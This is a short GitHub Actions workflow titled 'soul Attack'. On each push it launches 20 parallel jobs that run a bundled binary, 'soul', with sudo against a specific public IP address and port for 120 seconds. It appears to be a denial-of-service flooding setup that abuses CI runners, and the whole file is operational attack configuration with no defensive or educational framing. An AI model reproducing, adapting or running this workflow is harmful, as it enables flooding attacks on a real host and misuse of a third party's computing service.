name: soul Attack
on: [push]

jobs:
  attack:
    runs-on: ubuntu-22.04
    strategy:
      fail-fast: false
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x soul
    - run: sudo ./soul 34.4.25.184 26798 120 || true
